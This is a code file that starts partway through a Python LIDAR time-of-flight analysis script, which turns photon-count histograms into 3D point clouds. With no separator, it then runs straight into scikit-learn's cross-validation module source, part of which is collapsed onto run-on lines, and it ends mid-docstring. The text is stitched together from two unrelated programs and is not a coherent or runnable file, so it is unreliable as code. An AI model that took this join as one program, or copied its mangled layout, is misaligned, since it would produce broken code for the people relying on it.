    average_peak = 0 #some fun values to keep track of
    average_failed_peak = 0 #some fun values to keep track of
    F = 0 #Used to keep track of the number of failed pixels
    start = t.time() #Evaluate the time efficiency of the algorithms
    """
    Code block loops through all histograms. Removes background/internal
    reflections and calculates the distance to a reference value that must
    be measured separately (but is reused for all scans)
    """
    dimX = len(x_deg)
    dimY = len(y_deg)
    for i in range(0, dimY):
        print(i, "/", dimY)
        for j in range(0, dimX):
            h = histogram[j][i]
            #h = ToF_histogram_offset(h,delay, binsize)
            h[:index_cutoff] = 0 #Cuts away the internal reflections; background_cutoff is assigned in the ETA frontend and is based on a background measurement.
            peak = np.amax(h) #Identifies the target peak
            if peak > background: #removes pixels with only noise, noise threshold can be modified
                #d, _ = lidar.skewedgauss(time,h,index_ref) #Gaussian algorithm
                #d, _ = lidar.gauss(time,h,index_ref) #Gaussian algorithm
                #d = lidar.peak_distance(time,h, index_ref)
                #d = lidar.getDistance(index_ref, h, binsize = binsize) #Peak finding algorithm
                d, h = anal(time, h, index_ref)
                #The Gaussian algorithm can return np.NaN if unable to fit a curve;
                #very unlikely after the peak filtering above. It's a relic and might
                #be obsolete (but it's not hurting anyone). Note: `d != np.NaN` is
                #always True, so np.isnan() is required for this check to work.
                if not np.isnan(d):
                    x, y, z = lidar.XYZ(np.abs(d), x_deg[i], y_deg[j])
                    d_data[(x, y)] = z
                    i_data[(x, y)] = h
                    average_peak += peak
            else:
                x, y, z = lidar.XYZ(1, x_deg[i], y_deg[j])
                #x,y,z, = np.NaN, np.NaN, np.NaN
                d_data[(x, y)] = np.NaN
                i_data[(x, y)] = np.NaN
                F += 1
                average_failed_peak += peak
    stop = t.time()
    print("Failed pixels: ", F)
    print("Average peak: ", average_peak/(dimY*dimX - F))
    if F != 0:
        print("Average failed peak: ", average_failed_peak/F)
    print("3D analysis time: ", stop-start)
    return d_data, i_data


def main():
    """Set parameters for analysis and plotting"""
    recipe = "C:/Users/staff/Documents/Lidar LF/ETA_recipes/quTAG_LiDAR_1.2.eta" #ETA_recipe file

    #.timeres file to be analysed
    file = 'C:/Users/staff/Documents/Lidar LF/Data/220216/Fredrik_10.0ms_300kHz_-17.9uA_[4, 9, -5, -4.5]_200x200_220216.timeres'

    anal_method = "peak"

    #Parameters for etabackend to generate histograms
    base_binsize = 16 #Histogram binsize in ps
    base_bins = 6250 #Number of bins in the histogram: bins*binsize should equal 1/f where f is the repetition rate of the laser in use
    ch_sel = 't1' #Selects a specific histogram
    records_per_cut = 2e5 #Number of events to be used per evaluation cycle in ETA, not important in this code

    #Time offsets for different signals [ps]
    base_sync_delay = 0 #40000 #All events of the sync channel are delayed by 40000 ps (not necessary)
    base_delay = 10560 #16800 #

    base_dimX = 200 #Number of steps in the scan; steps == resolution
    base_dimY = 200

    histogram, START, load_time, TOF_anal_time = ToF_analysis(file, recipe, ch_sel, bins = base_bins, binsize=base_binsize, dimX=base_dimX, dimY=base_dimY, sync_delay = base_sync_delay)
    time = (np.arange(0, base_bins)*base_binsize) #Recreate time axis

    #----------------- Variables ---------------------
    #Scanning variables
    rect = [4, 9, -5, -4.5] #Voltage range of scan, linear to angle
    x_deg, y_deg = lidar.angles(rect, base_dimX, base_dimY)

    #Analysis parameters
    index_cutoff = 4520 #5220 #Removes the background noise. This value depends on the specifics of the setup and the delays. Must be optimised for new setups
    index_ref = 4500 #5150 #Time index of the mirror's position, used as origin when calculating 3D point clouds. Not at zero because the laser must first travel to the optical setup. Must be measured separately

    #Plotting parameters
    coff = 4 #Removes outliers for plotting purposes. Simply to avoid squished plots
    z_rot = 270 #Angle of view in the 3D plot
    x_rot = 20

    ##lidar.save_pixel_array(histogram, file, dimX, dimY, binsize) #To save some raw data for troubleshooting
    #lidar.save_all_pixels(histogram, file, dimX, dimY, binsize)

    d_data, i_data = analyse_3d(histogram, index_cutoff, index_ref, x_deg, y_deg, time, method = anal_method, background = 6, delay = base_delay)

    file = Path(file)
    print("Loading time: ", load_time)
    print("TOF analysis time: ", TOF_anal_time)
    print("Total Analysis time: ", t.time()-START)
    print(f"Length of d_data: {len(d_data)}| i_data: {len(i_data)}")

    #-------------------- Save code -------------
    print("Saving Images")
    coff = int(coff) #prevents the images from being too squished
    intensity_map.heatmap(i_data)
    #lidar.scatter(d_data, file, cutoff = coff, name = anal_method + "_Fit_", show = True)#, ylim = (300,600), xlim=(-200,200))
    #lidar.save_data(d_data, file, anal_method + '_')
    print("Job Done!")

if __name__ == '__main__':
    main()
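# Illustrative sketch only (LIDAR_lib itself is not shown in this file): the
# peak method above implies the standard time-of-flight conversion, where the
# delay between the histogram peak and the reference index maps to a one-way
# distance via d = c * t / 2. All names below are hypothetical stand-ins, not
# the actual lidar.peak_distance implementation.
import numpy as _np

C_MM_PER_PS = 0.299792458  # speed of light in mm per picosecond

def peak_distance_sketch(time_ps, hist, index_ref):
    index_peak = int(_np.argmax(hist))              # locate the target peak
    dt = time_ps[index_peak] - time_ps[index_ref]   # round-trip delay [ps]
    return C_MM_PER_PS * dt / 2                     # one-way distance [mm]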
""" The :mod:`sklearn.model_selection._validation` module includes classes and functions to validate the model. """ # Author: Alexandre Gramfort <alexandre.gramfort@inria.fr> # Gael Varoquaux <gael.varoquaux@normalesup.org> # Olivier Grisel <olivier.grisel@ensta.org> # Raghav RV <rvraghav93@gmail.com> # License: BSD 3 clause import warnings import numbers import time from traceback import format_exc from contextlib import suppress import numpy as np import scipy.sparse as sp from joblib import Parallel, logger from ..base import is_classifier, clone from ..utils import indexable, check_random_state, _safe_indexing from ..utils.validation import _check_fit_params from ..utils.validation import _num_samples from ..utils.validation import _deprecate_positional_args from ..utils.fixes import delayed from ..utils.metaestimators import _safe_split from ..metrics import check_scoring from ..metrics._scorer import _check_multimetric_scoring, _MultimetricScorer from ..exceptions import FitFailedWarning, NotFittedError from ._split import check_cv from ..preprocessing import LabelEncoder __all__ = ['cross_validate', 'cross_val_score', 'cross_val_predict', 'permutation_test_score', 'learning_curve', 'validation_curve'] @_deprecate_positional_args def cross_validate(estimator, X, y=None, *, groups=None, scoring=None, cv=None, n_jobs=None, verbose=0, fit_params=None, pre_dispatch='2*n_jobs', return_train_score=False, return_estimator=False, error_score=np.nan): """Evaluate metric(s) by cross-validation and also record fit/score times. Read more in the :ref:`User Guide <multimetric_cross_validation>`. Parameters ---------- estimator : estimator object implementing 'fit' The object to use to fit the data. X : array-like of shape (n_samples, n_features) The data to fit. Can be for example a list, or an array. y : array-like of shape (n_samples,) or (n_samples, n_outputs), \ default=None The target variable to try to predict in the case of supervised learning. groups : array-like of shape (n_samples,), default=None Group labels for the samples used while splitting the dataset into train/test set. Only used in conjunction with a "Group" :term:`cv` instance (e.g., :class:`GroupKFold`). scoring : str, callable, list, tuple, or dict, default=None Strategy to evaluate the performance of the cross-validated model on the test set. If `scoring` represents a single score, one can use: - a single string (see :ref:`scoring_parameter`); - a callable (see :ref:`scoring`) that returns a single value. If `scoring` reprents multiple scores, one can use: - a list or tuple of unique strings; - a callable returning a dictionary where the keys are the metric names and the values are the metric scores; - a dictionary with metric names as keys and callables a values. See :ref:`multimetric_grid_search` for an example. cv : int, cross-validation generator or an iterable, default=None Determines the cross-validation splitting strategy. Possible inputs for cv are: - None, to use the default 5-fold cross validation, - int, to specify the number of folds in a `(Stratified)KFold`, - :term:`CV splitter`, - An iterable yielding (train, test) splits as arrays of indices. For int/None inputs, if the estimator is a classifier and ``y`` is either binary or multiclass, :class:`StratifiedKFold` is used. In all other cases, :class:`KFold` is used. Refer :ref:`User Guide <cross_validation>` for the various cross-validation strategies that can be used here. .. versionchanged:: 0.22 ``cv`` default value if None changed from 3-fold to 5-fold. 
n_jobs : int, default=None Number of jobs to run in parallel. Training the estimator and computing the score are parallelized over the cross-validation splits. ``None`` means 1 unless in a :obj:`joblib.parallel_backend` context. ``-1`` means using all processors. See :term:`Glossary <n_jobs>` for more details. verbose : int, default=0 The verbosity level. fit_params : dict, default=None Parameters to pass to the fit method of the estimator. pre_dispatch : int or str, default='2*n_jobs' Controls the number of jobs that get dispatched during parallel execution. Reducing this number can be useful to avoid an explosion of memory consumption when more jobs get dispatched than CPUs can process. This parameter can be: - None, in which case all the jobs are immediately created and spawned. Use this for lightweight and fast-running jobs, to avoid delays due to on-demand spawning of the jobs - An int, giving the exact number of total jobs that are spawned - A str, giving an expression as a function of n_jobs, as in '2*n_jobs' return_train_score : bool, default=False Whether to include train scores. Computing training scores is used to get insights on how different parameter settings impact the overfitting/underfitting trade-off. However computing the scores on the training set can be computationally expensive and is not strictly required to select the parameters that yield the best generalization performance. .. versionadded:: 0.19 .. versionchanged:: 0.21 Default value was changed from ``True`` to ``False`` return_estimator : bool, default=False Whether to return the estimators fitted on each split. .. versionadded:: 0.20 error_score : 'raise' or numeric, default=np.nan Value to assign to the score if an error occurs in estimator fitting. If set to 'raise', the error is raised. If a numeric value is given, FitFailedWarning is raised. .. versionadded:: 0.20 Returns ------- scores : dict of float arrays of shape (n_splits,) Array of scores of the estimator for each run of the cross validation. A dict of arrays containing the score/time arrays for each scorer is returned. The possible keys for this ``dict`` are: ``test_score`` The score array for test scores on each cv split. Suffix ``_score`` in ``test_score`` changes to a specific metric like ``test_r2`` or ``test_auc`` if there are multiple scoring metrics in the scoring parameter. ``train_score`` The score array for train scores on each cv split. Suffix ``_score`` in ``train_score`` changes to a specific metric like ``train_r2`` or ``train_auc`` if there are multiple scoring metrics in the scoring parameter. This is available only if ``return_train_score`` parameter is ``True``. ``fit_time`` The time for fitting the estimator on the train set for each cv split. ``score_time`` The time for scoring the estimator on the test set for each cv split. (Note time for scoring on the train set is not included even if ``return_train_score`` is set to ``True`` ``estimator`` The estimator objects for each cv split. This is available only if ``return_estimator`` parameter is set to ``True``. 
    Examples
    --------
    >>> from sklearn import datasets, linear_model
    >>> from sklearn.model_selection import cross_validate
    >>> from sklearn.metrics import make_scorer
    >>> from sklearn.metrics import confusion_matrix
    >>> from sklearn.svm import LinearSVC
    >>> diabetes = datasets.load_diabetes()
    >>> X = diabetes.data[:150]
    >>> y = diabetes.target[:150]
    >>> lasso = linear_model.Lasso()

    Single metric evaluation using ``cross_validate``

    >>> cv_results = cross_validate(lasso, X, y, cv=3)
    >>> sorted(cv_results.keys())
    ['fit_time', 'score_time', 'test_score']
    >>> cv_results['test_score']
    array([0.33150734, 0.08022311, 0.03531764])

    Multiple metric evaluation using ``cross_validate``
    (please refer the ``scoring`` parameter doc for more information)

    >>> scores = cross_validate(lasso, X, y, cv=3,
    ...                         scoring=('r2', 'neg_mean_squared_error'),
    ...                         return_train_score=True)
    >>> print(scores['test_neg_mean_squared_error'])
    [-3635.5... -3573.3... -6114.7...]
    >>> print(scores['train_r2'])
    [0.28010158 0.39088426 0.22784852]

    See Also
    ---------
    cross_val_score : Run cross-validation for single metric evaluation.

    cross_val_predict : Get predictions from each split of cross-validation for
        diagnostic purposes.

    sklearn.metrics.make_scorer : Make a scorer from a performance metric or
        loss function.

    """
    X, y, groups = indexable(X, y, groups)

    cv = check_cv(cv, y, classifier=is_classifier(estimator))

    if callable(scoring):
        scorers = scoring
    elif scoring is None or isinstance(scoring, str):
        scorers = check_scoring(estimator, scoring)
    else:
        scorers = _check_multimetric_scoring(estimator, scoring)

    # We clone the estimator to make sure that all the folds are
    # independent, and that it is pickle-able.
    parallel = Parallel(n_jobs=n_jobs, verbose=verbose,
                        pre_dispatch=pre_dispatch)
    results = parallel(
        delayed(_fit_and_score)(
            clone(estimator), X, y, scorers, train, test, verbose, None,
            fit_params, return_train_score=return_train_score,
            return_times=True, return_estimator=return_estimator,
            error_score=error_score)
        for train, test in cv.split(X, y, groups))

    # For callable scoring, the return type is only known after calling. If
    # the return type is a dictionary, the error scores can now be inserted
    # with the correct key.
    if callable(scoring):
        _insert_error_scores(results, error_score)

    results = _aggregate_score_dicts(results)

    ret = {}
    ret['fit_time'] = results["fit_time"]
    ret['score_time'] = results["score_time"]

    if return_estimator:
        ret['estimator'] = results["estimator"]

    test_scores_dict = _normalize_score_results(results["test_scores"])
    if return_train_score:
        train_scores_dict = _normalize_score_results(results["train_scores"])

    for name in test_scores_dict:
        ret['test_%s' % name] = test_scores_dict[name]
        if return_train_score:
            key = 'train_%s' % name
            ret[key] = train_scores_dict[name]

    return ret


def _insert_error_scores(results, error_score):
    """Insert error in `results` by replacing them inplace with `error_score`.

    This only applies to multimetric scores because `_fit_and_score` will
    handle the single metric case.
""" successful_score = None failed_indices = [] for i, result in enumerate(results): if result["fit_failed"]: failed_indices.append(i) elif successful_score is None: successful_score = result["test_scores"] if successful_score is None: raise NotFittedError("All estimators failed to fit") if isinstance(successful_score, dict): formatted_error = {} for name, score in successful_score.items(): if isinstance(score, np.ndarray) and error_score != 'raise': formatted_error[name] = np.full_like(score, error_score) else: formatted_error[name] = error_score for i in failed_indices: results[i]["test_scores"] = formatted_error.copy() if "train_scores" in results[i]: results[i]["train_scores"] = formatted_error.copy() def _normalize_score_results(scores, scaler_score_key='score'): """Creates a scoring dictionary based on the type of `scores`""" if isinstance(scores[0], dict): # multimetric scoring return _aggregate_score_dicts(scores) # scaler return {scaler_score_key: scores} @_deprecate_positional_args def cross_val_score(estimator, X, y=None, *, groups=None, scoring=None, cv=None, n_jobs=None, verbose=0, fit_params=None, pre_dispatch='2*n_jobs', error_score=np.nan): """Evaluate a score by cross-validation Read more in the :ref:`User Guide <cross_validation>`. Parameters ---------- estimator : estimator object implementing 'fit' The object to use to fit the data. X : array-like of shape (n_samples, n_features) The data to fit. Can be for example a list, or an array. y : array-like of shape (n_samples,) or (n_samples, n_outputs), \ default=None The target variable to try to predict in the case of supervised learning. groups : array-like of shape (n_samples,), default=None Group labels for the samples used while splitting the dataset into train/test set. Only used in conjunction with a "Group" :term:`cv` instance (e.g., :class:`GroupKFold`). scoring : str or callable, default=None A str (see model evaluation documentation) or a scorer callable object / function with signature ``scorer(estimator, X, y)`` which should return only a single value. Similar to :func:`cross_validate` but only a single metric is permitted. If None, the estimator's default scorer (if available) is used. cv : int, cross-validation generator or an iterable, default=None Determines the cross-validation splitting strategy. Possible inputs for cv are: - None, to use the default 5-fold cross validation, - int, to specify the number of folds in a `(Stratified)KFold`, - :term:`CV splitter`, - An iterable yielding (train, test) splits as arrays of indices. For int/None inputs, if the estimator is a classifier and ``y`` is either binary or multiclass, :class:`StratifiedKFold` is used. In all other cases, :class:`KFold` is used. Refer :ref:`User Guide <cross_validation>` for the various cross-validation strategies that can be used here. .. versionchanged:: 0.22 ``cv`` default value if None changed from 3-fold to 5-fold. n_jobs : int, default=None Number of jobs to run in parallel. Training the estimator and computing the score are parallelized over the cross-validation splits. ``None`` means 1 unless in a :obj:`joblib.parallel_backend` context. ``-1`` means using all processors. See :term:`Glossary <n_jobs>` for more details. verbose : int, default=0 The verbosity level. fit_params : dict, default=None Parameters to pass to the fit method of the estimator. pre_dispatch : int or str, default='2*n_jobs' Controls the number of jobs that get dispatched during parallel execution. 
Reducing this number can be useful to avoid an explosion of memory consumption when more jobs get dispatched than CPUs can process. This parameter can be: - None, in which case all the jobs are immediately created and spawned. Use this for lightweight and fast-running jobs, to avoid delays due to on-demand spawning of the jobs - An int, giving the exact number of total jobs that are spawned - A str, giving an expression as a function of n_jobs, as in '2*n_jobs' error_score : 'raise' or numeric, default=np.nan Value to assign to the score if an error occurs in estimator fitting. If set to 'raise', the error is raised. If a numeric value is given, FitFailedWarning is raised. .. versionadded:: 0.20 Returns ------- scores : ndarray of float of shape=(len(list(cv)),) Array of scores of the estimator for each run of the cross validation. Examples -------- >>> from sklearn import datasets, linear_model >>> from sklearn.model_selection import cross_val_score >>> diabetes = datasets.load_diabetes() >>> X = diabetes.data[:150] >>> y = diabetes.target[:150] >>> lasso = linear_model.Lasso() >>> print(cross_val_score(lasso, X, y, cv=3)) [0.33150734 0.08022311 0.03531764] See Also --------- cross_validate : To run cross-validation on multiple metrics and also to return train scores, fit times and score times. cross_val_predict : Get predictions from each split of cross-validation for diagnostic purposes. sklearn.metrics.make_scorer : Make a scorer from a performance metric or loss function. """ # To ensure multimetric format is not supported scorer = check_scoring(estimator, scoring=scoring) cv_results = cross_validate(estimator=estimator, X=X, y=y, groups=groups, scoring={'score': scorer}, cv=cv, n_jobs=n_jobs, verbose=verbose, fit_params=fit_params, pre_dispatch=pre_dispatch, error_score=error_score) return cv_results['test_score'] def _fit_and_score(estimator, X, y, scorer, train, test, verbose, parameters, fit_params, return_train_score=False, return_parameters=False, return_n_test_samples=False, return_times=False, return_estimator=False, split_progress=None, candidate_progress=None, error_score=np.nan): """Fit estimator and compute scores for a given dataset split. Parameters ---------- estimator : estimator object implementing 'fit' The object to use to fit the data. X : array-like of shape (n_samples, n_features) The data to fit. y : array-like of shape (n_samples,) or (n_samples, n_outputs) or None The target variable to try to predict in the case of supervised learning. scorer : A single callable or dict mapping scorer name to the callable If it is a single callable, the return value for ``train_scores`` and ``test_scores`` is a single float. For a dict, it should be one mapping the scorer name to the scorer callable object / function. The callable object / fn should have signature ``scorer(estimator, X, y)``. train : array-like of shape (n_train_samples,) Indices of training samples. test : array-like of shape (n_test_samples,) Indices of test samples. verbose : int The verbosity level. error_score : 'raise' or numeric, default=np.nan Value to assign to the score if an error occurs in estimator fitting. If set to 'raise', the error is raised. If a numeric value is given, FitFailedWarning is raised. parameters : dict or None Parameters to be set on the estimator. fit_params : dict or None Parameters that will be passed to ``estimator.fit``. return_train_score : bool, default=False Compute and return score on training set. 
    return_parameters : bool, default=False
        Return parameters that have been used for the estimator.

    split_progress : {list, tuple} of int, default=None
        A list or tuple of format (<current_split_id>, <total_num_of_splits>).

    candidate_progress : {list, tuple} of int, default=None
        A list or tuple of format
        (<current_candidate_id>, <total_number_of_candidates>).

    return_n_test_samples : bool, default=False
        Whether to return the ``n_test_samples``.

    return_times : bool, default=False
        Whether to return the fit/score times.

    return_estimator : bool, default=False
        Whether to return the fitted estimator.

    Returns
    -------
    result : dict with the following attributes
        train_scores : dict of scorer name -> float
            Score on training set (for all the scorers),
            returned only if `return_train_score` is `True`.
        test_scores : dict of scorer name -> float
            Score on testing set (for all the scorers).
        n_test_samples : int
            Number of test samples.
        fit_time : float
            Time spent for fitting in seconds.
        score_time : float
            Time spent for scoring in seconds.
        parameters : dict or None
            The parameters that have been evaluated.
        estimator : estimator object
            The fitted estimator.
        fit_failed : bool
            The estimator failed to fit.
    """
    if not isinstance(error_score, numbers.Number) and error_score != 'raise':
        raise ValueError(
            "error_score must be the string 'raise' or a numeric value. "
            "(Hint: if using 'raise', please make sure that it has been "
            "spelled correctly.)"
        )

    progress_msg = ""
    if verbose > 2:
        if split_progress is not None:
            progress_msg = f" {split_progress[0]+1}/{split_progress[1]}"
        if candidate_progress and verbose > 9:
            progress_msg += (f"; {candidate_progress[0]+1}/"
                             f"{candidate_progress[1]}")

    if verbose > 1:
        if parameters is None:
            params_msg = ''
        else:
            sorted_keys = sorted(parameters)  # Ensure deterministic o/p
            params_msg = (', '.join(f'{k}={parameters[k]}'
                                    for k in sorted_keys))
    if verbose > 9:
        start_msg = f"[CV{progress_msg}] START {params_msg}"
        print(f"{start_msg}{(80 - len(start_msg)) * '.'}")

    # Adjust length of sample weights
    fit_params = fit_params if fit_params is not None else {}
    fit_params = _check_fit_params(X, fit_params, train)

    if parameters is not None:
        # clone after setting parameters in case any parameters
        # are estimators (like pipeline steps)
        # because pipeline doesn't clone steps in fit
        cloned_parameters = {}
        for k, v in parameters.items():
            cloned_parameters[k] = clone(v, safe=False)

        estimator = estimator.set_params(**cloned_parameters)

    start_time = time.time()

    X_train, y_train = _safe_split(estimator, X, y, train)
    X_test, y_test = _safe_split(estimator, X, y, test, train)

    result = {}
    try:
        if y_train is None:
            estimator.fit(X_train, **fit_params)
        else:
            estimator.fit(X_train, y_train, **fit_params)

    except Exception as e:
        # Note fit time as time until error
        fit_time = time.time() - start_time
        score_time = 0.0
        if error_score == 'raise':
            raise
        elif isinstance(error_score, numbers.Number):
            if isinstance(scorer, dict):
                test_scores = {name: error_score for name in scorer}
                if return_train_score:
                    train_scores = test_scores.copy()
            else:
                test_scores = error_score
                if return_train_score:
                    train_scores = error_score
        warnings.warn("Estimator fit failed. The score on this train-test"
                      " partition for these parameters will be set to %f. 
" "Details: \n%s" % (error_score, format_exc()), FitFailedWarning) result["fit_failed"] = True else: fit_time = time.time() - start_time with warnings.catch_warnings(record=True) as score_warnings: test_scores = _score(estimator, X_test, y_test, scorer, error_score) score_time = time.time() - start_time - fit_time if return_train_score: train_scores = _score( estimator, X_train, y_train, scorer, error_score ) if score_warnings: result["fit_failed"] = True for w in score_warnings: warnings.showwarning(w.message, w.category, w.filename, w.lineno, w.file, w.line) else: result["fit_failed"] = False if verbose > 1: total_time = score_time + fit_time end_msg = f"[CV{progress_msg}] END " result_msg = params_msg + (";" if params_msg else "") if verbose > 2: if isinstance(test_scores, dict): for scorer_name in sorted(test_scores): result_msg += f" {scorer_name}=" if isinstance(test_scores[scorer_name], np.ndarray): fmt_str = '' else: fmt_str = '.3f' if return_train_score: scorer_scores = train_scores[scorer_name] result_msg += f"(train={scorer_scores:{fmt_str}}, test={test_scores[scorer_name]:{fmt_str}})," else: result_msg += f"{test_scores[scorer_name]:{fmt_str}}," else: result_msg += " score=" result_msg += (f"{test_scores:.3f}," if not return_train_score else f"(train={train_scores:.3f}, test={test_scores:.3f}),") result_msg += f" total time={logger.short_format_time(total_time)}" # Right align the result_msg end_msg += "." * (80 - len(end_msg) - len(result_msg)) end_msg += result_msg print(end_msg) result["test_scores"] = test_scores if return_train_score: result["train_scores"] = train_scores if return_n_test_samples: result["n_test_samples"] = _num_samples(X_test) if return_times: result["fit_time"] = fit_time result["score_time"] = score_time if return_parameters: result["parameters"] = parameters if return_estimator: result["estimator"] = estimator return result def _score(estimator, X_test, y_test, scorer, error_score="raise"): """Compute the score(s) of an estimator on a given test set. Will return a dict of floats if `scorer` is a dict, otherwise a single float is returned. """ if isinstance(scorer, dict): # will cache method calls if needed. scorer() returns a dict scorer = _MultimetricScorer(**scorer) try: if y_test is None: scores = scorer(estimator, X_test) else: scores = scorer(estimator, X_test, y_test) except Exception: if error_score == 'raise': raise else: if isinstance(scorer, _MultimetricScorer): scores = {name: error_score for name in scorer._scorers} else: scores = error_score warnings.warn( f"Scoring failed. The score on this train-test partition for " f"these parameters will be set to {error_score}. Details: \n" f"{format_exc()}", UserWarning, ) error_msg = ( "scoring must return a number, got %s (%s) instead. (scorer=%s)" ) if isinstance(scores, dict): for name, score in scores.items(): if hasattr(score, 'item'): with suppress(ValueError): # e.g. unwrap memmapped scalars score = score.item() elif isinstance(score, tuple): score = np.stack(score) if not isinstance(score, (numbers.Number, np.ndarray)): raise ValueError(error_msg % (score, type(score), name)) scores[name] = score else: # scalar if hasattr(scores, 'item'): with suppress(ValueError): # e.g. 
unwrap memmapped scalars
                scores = scores.item()
        if not isinstance(scores, numbers.Number):
            raise ValueError(error_msg % (scores, type(scores), scorer))
    return scores


@_deprecate_positional_args
def cross_val_predict(estimator, X, y=None, *, groups=None, cv=None,
                      n_jobs=None, verbose=0, fit_params=None,
                      pre_dispatch='2*n_jobs', method='predict'):
    """Generate cross-validated estimates for each input data point.

    The data is split according to the cv parameter. Each sample belongs
    to exactly one test set, and its prediction is computed with an
    estimator fitted on the corresponding training set.

    Passing these predictions into an evaluation metric may not be a valid
    way to measure generalization performance. Results can differ from
    :func:`cross_validate` and :func:`cross_val_score` unless all tests sets
    have equal size and the metric decomposes over samples.

    Read more in the :ref:`User Guide <cross_validation>`.

    Parameters
    ----------
    estimator : estimator object implementing 'fit' and 'predict'
        The object to use to fit the data.

    X : array-like of shape (n_samples, n_features)
        The data to fit. Can be, for example, a list or an array of
        at least 2d.

    y : array-like of shape (n_samples,) or (n_samples, n_outputs), \
            default=None
        The target variable to try to predict in the case of
        supervised learning.

    groups : array-like of shape (n_samples,), default=None
        Group labels for the samples used while splitting the dataset into
        train/test set. Only used in conjunction with a "Group" :term:`cv`
        instance (e.g., :class:`GroupKFold`).

    cv : int, cross-validation generator or an iterable, default=None
        Determines the cross-validation splitting strategy.
        Possible inputs for cv are:

        - None, to use the default 5-fold cross validation,
        - int, to specify the number of folds in a `(Stratified)KFold`,
        - :term:`CV splitter`,
        - An iterable yielding (train, test) splits as arrays of indices.

        For int/None inputs, if the estimator is a classifier and ``y`` is
        either binary or multiclass, :class:`StratifiedKFold` is used. In all
        other cases, :class:`KFold` is used. Refer :ref:`User Guide
        <cross_validation>` for the various cross-validation strategies that
        can be used here.

        .. versionchanged:: 0.22
            ``cv`` default value if None changed from 3-fold to 5-fold.

    n_jobs : int, default=None
        Number of jobs to run in parallel. Training the estimator and
        predicting are parallelized over the cross-validation splits.
        ``None`` means 1 unless in a :obj:`joblib.parallel_backend` context.
        ``-1`` means using all processors. See :term:`Glossary <n_jobs>`
        for more details.

    verbose : int, default=0
        The verbosity level.

    fit_params : dict, default=None
        Parameters to pass to the fit method of the estimator.

    pre_dispatch : int or str, default='2*n_jobs'
        Controls the number of jobs that get dispatched during parallel
        execution. Reducing this number can be useful to avoid an
        explosion of memory consumption when more jobs get dispatched
        than CPUs can process. This parameter can be:

        - None, in which case all the jobs are immediately
          created and spawned. Use this for lightweight and
          fast-running jobs, to avoid delays due to on-demand
          spawning of the jobs

        - An int, giving the exact number of total jobs that are
          spawned

        - A str, giving an expression as a function of n_jobs,
          as in '2*n_jobs'

    method : {'predict', 'predict_proba', 'predict_log_proba', \
              'decision_function'}, default='predict'
        The method to be invoked by `estimator`.

    Returns
    -------
    predictions : ndarray
        This is the result of calling `method`.
Shape: - When `method` is 'predict' and in special case where `method` is 'decision_function' and the target is binary: (n_samples,) - When `method` is one of {'predict_proba', 'predict_log_proba', 'decision_function'} (unless special case above): (n_samples, n_classes) - If `estimator` is :term:`multioutput`, an extra dimension 'n_outputs' is added to the end of each shape above. See Also -------- cross_val_score : Calculate score for each CV split. cross_validate : Calculate one or more scores and timings for each CV split. Notes ----- In the case that one or more classes are absent in a training portion, a default score needs to be assigned to all instances for that class if ``method`` produces columns per class, as in {'decision_function', 'predict_proba', 'predict_log_proba'}. For ``predict_proba`` this value is 0. In order to ensure finite output, we approximate negative infinity by the minimum finite float value for the dtype in other cases. Examples -------- >>> from sklearn import datasets, linear_model >>> from sklearn.model_selection import cross_val_predict >>> diabetes = datasets.load_diabetes() >>> X = diabetes.data[:150] >>> y = diabetes.target[:150] >>> lasso = linear_model.Lasso() >>> y_pred = cross_val_predict(lasso, X, y, cv=3) """ X, y, groups = indexable(X, y, groups) cv = check_cv(cv, y, classifier=is_classifier(estimator)) splits = list(cv.split(X, y, groups)) test_indices = np.concatenate([test for _, test in splits]) if not _check_is_permutation(test_indices, _num_samples(X)): raise ValueError('cross_val_predict only works for partitions') # If classification methods produce multiple columns of output, # we need to manually encode classes to ensure consistent column ordering. encode = method in ['decision_function', 'predict_proba', 'predict_log_proba'] and y is not None if encode: y = np.asarray(y) if y.ndim == 1: le = LabelEncoder() y = le.fit_transform(y) elif y.ndim == 2: y_enc = np.zeros_like(y, dtype=int) for i_label in range(y.shape[1]): y_enc[:, i_label] = LabelEncoder().fit_transform(y[:, i_label]) y = y_enc # We clone the estimator to make sure that all the folds are # independent, and that it is pickle-able. parallel = Parallel(n_jobs=n_jobs, verbose=verbose, pre_dispatch=pre_dispatch) predictions = parallel(delayed(_fit_and_predict)( clone(estimator), X, y, train, test, verbose, fit_params, method) for train, test in splits) inv_test_indices = np.empty(len(test_indices), dtype=int) inv_test_indices[test_indices] = np.arange(len(test_indices)) if sp.issparse(predictions[0]): predictions = sp.vstack(predictions, format=predictions[0].format) elif encode and isinstance(predictions[0], list): # `predictions` is a list of method outputs from each fold. # If each of those is also a list, then treat this as a # multioutput-multiclass task. We need to separately concatenate # the method outputs for each label into an `n_labels` long list. n_labels = y.shape[1] concat_pred = [] for i_label in range(n_labels): label_preds = np.concatenate([p[i_label] for p in predictions]) concat_pred.append(label_preds) predictions = concat_pred else: predictions = np.concatenate(predictions) if isinstance(predictions, list): return [p[inv_test_indices] for p in predictions] else: return predictions[inv_test_indices] def _fit_and_predict(estimator, X, y, train, test, verbose, fit_params, method): """Fit estimator and predict values for a given dataset split. Read more in the :ref:`User Guide <cross_validation>`. 
Parameters ---------- estimator : estimator object implementing 'fit' and 'predict' The object to use to fit the data. X : array-like of shape (n_samples, n_features) The data to fit. .. versionchanged:: 0.20 X is only required to be an object with finite length or shape now y : array-like of shape (n_samples,) or (n_samples, n_outputs) or None The target variable to try to predict in the case of supervised learning. train : array-like of shape (n_train_samples,) Indices of training samples. test : array-like of shape (n_test_samples,) Indices of test samples. verbose : int The verbosity level. fit_params : dict or None Parameters that will be passed to ``estimator.fit``. method : str Invokes the passed method name of the passed estimator. Returns ------- predictions : sequence Result of calling 'estimator.method' """ # Adjust length of sample weights fit_params = fit_params if fit_params is not None else {} fit_params = _check_fit_params(X, fit_params, train) X_train, y_train = _safe_split(estimator, X, y, train) X_test, _ = _safe_split(estimator, X, y, test, train) if y_train is None: estimator.fit(X_train, **fit_params) else: estimator.fit(X_train, y_train, **fit_params) func = getattr(estimator, method) predictions = func(X_test) encode = method in ['decision_function', 'predict_proba', 'predict_log_proba'] and y is not None if encode: if isinstance(predictions, list): predictions = [_enforce_prediction_order( estimator.classes_[i_label], predictions[i_label], n_classes=len(set(y[:, i_label])), method=method) for i_label in range(len(predictions))] else: # A 2D y array should be a binary label indicator matrix n_classes = len(set(y)) if y.ndim == 1 else y.shape[1] predictions = _enforce_prediction_order( estimator.classes_, predictions, n_classes, method) return predictions def _enforce_prediction_order(classes, predictions, n_classes, method): """Ensure that prediction arrays have correct column order When doing cross-validation, if one or more classes are not present in the subset of data used for training, then the output prediction array might not have the same columns as other 